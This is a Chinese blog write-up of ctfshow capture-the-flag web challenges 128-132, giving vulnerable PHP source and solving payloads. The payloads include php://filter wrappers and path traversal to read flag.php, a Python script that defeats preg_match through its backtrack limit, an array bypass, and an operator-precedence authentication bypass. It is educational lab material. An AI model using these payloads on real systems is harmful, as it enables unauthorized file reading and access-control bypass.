ctfshow web入门128-132

已于 2022-02-28 21:27:50 修改
阅读量850 收藏 1
点赞数 1
分类专栏: ctfshow 文章标签: php
于 2022-02-28 21:26:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/123192682
版权

目录

Web 128

Web 129

Web 130

Web 131

Web 132

Web 128

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-10 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-12 19:49:05

*/


error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

$f1 = $_GET['f1'];
$f2 = $_GET['f2'];

if(check($f1)){
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo "嗯哼?";
}



function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);
}

一个新的姿势,当php扩展目录下有php_gettext.dll时:

_()是一个函数。

_()==gettext() 是gettext()的拓展函数,开启text扩展get_defined_vars — 返回由所有已定义变量所组成的数组。

call_user_func — 把第一个参数作为回调函数调用,第一个参数是被调用的回调函数,其余参数是回调函数的参数。

当正常的gettext(“get_defined_vars”);时会返还get_defined_vars

为了绕过正则,_()函数和gettext()的效果一样,所以可以用_()函数代替gettext()函数。

call_user_func会利用_()将get_defined_vars返还出来然后再有一个call_user_func来调用get_defined_vars函数,然后利用var_dump函数就可以得到flag。

Payload:?f1=_&f2=get_defined_vars

Web 129

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-13 03:18:40

*/


error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['f'])){
    $f = $_GET['f'];
    if(stripos($f, 'ctfshow')>0){
        echo readfile($f);
    }
}

stripos() 函数——查找字符串在另一字符串中第一次出现的位置(区分大小写),返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。

所以f中需要有ctfshow 。

readfile() 函数输出一个文件。

利用php伪协议可以套一层协议,无效的话会被忽略。

Payload:

?f=php://filter/convert.base64-encode/ctfshow/resource=flag.php

Base64解码得flag:

或者可以直接读取flag.php省去base64加密

Payload:?f=php://filter/ctfshow/resource=flag.php

还可以利用文件穿越来得到flag。

Payload:

?f=/ctfshow/../../../../var/www/html/flag.php

还有一种

payload:?f=./ctfshow/../flag.php

但看不懂。

Web 130

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-13 05:19:40

*/


error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
    $f = $_POST['f'];

    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f, 'ctfshow') === FALSE){
        die('bye!!');
    }

    echo $flag;

}

刚开始没看懂,但随手试了几次就出来了flag。

Payload:

POST:f=ctfshow

但还是不太理解,网上看了看多位大佬得wp。

.表示任意单个字符,+表示必须匹配1次或多次,+?表示 重复1次或更多次,但尽可能少重复

所以在ctfshow前面必须有至少一个字符,才会返回true

所以才有了直接f=ctfshow。

还可以利用回溯限制来绕过。

当回溯的次数绕过了25万是preg_match返回的非1和0,而是false,所以可以绕过preg_match函数。

import requests

url='http://8d380352-394f-4754-8bde-5c906930bcd2.challenge.ctf.show/'
data={
    'f':'very'*250000+'ctfshow'
}
r=requests.post(url=url,data=data).text
print(r)

还可以通过数组来绕过,这是一个新东西。

stripos应用于数组的时候会返回null,null!==false。

Payload:

POST: f[]=1

Web 131

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-13 05:19:40

*/


error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
    $f = (String)$_POST['f'];

    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f,'36Dctfshow') === FALSE){
        die('bye!!');
    }

    echo $flag;

}

上一题的另外两种方法不能用了,只能老老实实回溯了。

import requests

url='http://7827dca0-b812-4948-bac9-0cd382fd656e.challenge.ctf.show/'
data={
    'f':'very'*250000+'36Dctfshow'
}
r=requests.post(url=url,data=data).text
print(r)

运行得到flag。

Web 132

上来发现一个网站,我还以为我进错了,又重新进了一遍发现没错,买啥思路,只能用御剑扫描一下。

发现有后缀/admin的网站访问发现以下代码。

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 06:22:13
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-13 20:05:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

#error_reporting(0);
include("flag.php");
highlight_file(__FILE__);


if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
    $username = (String)$_GET['username'];
    $password = (String)$_GET['password'];
    $code = (String)$_GET['code'];

    if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
        
        if($code == 'admin'){
            echo $flag;
        }
        
    }
}

&&的优先级高于||所以在

if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin")

中,先回运行&&再会运行||,当对于“与”(&&) 运算: x && y 当x为false时,直接跳过,不执行y; 对于“或”(||) 运算 : x||y 当x为true时,直接跳过,不执行y。

可以让第一个为flise并且令username为admin。

Payload:?code=admin&password=1&username=admin

f0njl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow web入门 PHP特性中篇(web105-web132)
ccfly1012的博客
09-11 1339
目录 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 web123 web125 web126 web127 web128 web129 web130 web131 web132 web105 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 1
CTFshow php特性 web128
Kradress的博客
12-17 227
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-10 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-12 19:49:05 */ error_reporting(0); include("flag.php"); highlight_file(__FILE__); $f1 = $_GET[
CTFshow php特性 web132
Kradress的博客
12-17 199
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 06:22:13 # @Last Modified by: h1xa # @Last Modified time: 2020-10-13 20:05:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ #error_reporting(0); include(
CTFSHOW~WEB入门
ing_end的博客
01-21 1246
WEB~4(2022.1.16) 看题目,提示我们查看robots.txt文件 注:什么是robots.txt文件?   搜索引擎通过一种程序robot(又称spider),自动访问互联网上的网页并获取网页信息。   您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分,这样,该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定搜索引擎只收录指定的内容。 robots.txt文件放在哪里? robots.txt文件应该放在...
CTFshow web(php特性125-128
csjjjd的博客
02-06 1538
这样既不会出现($_GET['fl0g'])又可以满足 if($fl0g==="flag_give_me"){解析:既然矛盾了,那我就把$_GET['fl0g']解析成别的不就好了!isset($_GET['fl0g'])似乎矛盾了,这里使用变量覆盖。并将参数 "get_defined_vars" 传递给它。php的变量名不能带点和空格,否则会被解析成为下划线。我这里没有POST :f10g啊,那怎么办?返回true,代码进入了if语句块中。既然过滤了_,那就用空格就好。,从而输出flag的值。
ctfshow-VIP题目-Web-详细解题思路
01-27
ctfshow-VIP题目-Web-详细解题思路
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFshow php特性 web129
Kradress的博客
12-17 367
目录源码思路题解解法一解法二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-13 03:18:40 */ error_reporting(0); highlight_file(__FILE__); if(isset($_GET['f'])){ $
ctfshow php特性 web89-web115 web123-150wp
mumuzi的博客
02-01 4228
皮爱吃皮特性
ctfshow学习记录-web入门php特性127-136)
龟速更新的九某人
07-26 1279
ctfshow学习记录-web入门php特性web127-136)
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 1806
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
ctfshow php特性 web 89~150plus
shinygod的博客
03-07 680
目录web 92web 93web 94web 95web 96web 97web 98web 99web 100web 101web 102web 103web 104 web 92 num=0x117c intval($num,$base=0) //当base为0时,会自动检测num的进制 //例如:0x117c(16进制) == 4476(十进制) == 010574(8进制) web 93 在这里插入代码片 web 94 web 95 web 96 web 97 web 98 web 99 w
CTFshow web入门——php特性
小元砸的博客
02-20 5245
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
CTFSHOW WEB入门
qq_51558360的博客
10-11 4302
----------信息搜集---------- 源码泄露 查看源码即可 前台JS绕过 直接开发者工具查看源码 当然也可以抓包查看 也可以禁用js查看源码 协议头信息泄露 或者抓一下包也可 robots后台泄露 phps源码泄露 根据题目猜测输入index.phps 下载到一个index.phps打开得到flag 源码压缩包泄露 访问www.zip 没有flag,尝试访问fl000g.txt 版本控制泄露源码 Git是一个开源的分布式版本控制系统 git代码泄露,git上传代码会在目录创
ctfshow web入门118-150wp
Firebasky的博客
10-25 1088
前段时间太忙啦,就没有发。但是羽师傅也发了呢 CTFSHOW PHP特性篇(中篇 111-131) CTFSHOW PHP特性篇 (下篇132-150) 我就不写博客啦,还是发pdf吧,需要的可以下载 链接:https://pan.baidu.com/s/1YnkfV5wfCqPFr2HW1MwUEg 提取码:c0gf 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
ctfshow web入门 php特性 web131-web135
m0_62207170的博客
10-05 608
ctfshow web入门 php特性 web131-web135
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1.了解Web基础知识,例如HTTP协议、HTML、CSS、JavaScript等。 2.学习Web漏洞,例如SQL注入、XSS、CSRF等。 3.掌握一些常用的Web工具,例如Burp Suite、sqlmap、dirbuster等。 4.多练习,多尝试,多思考。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值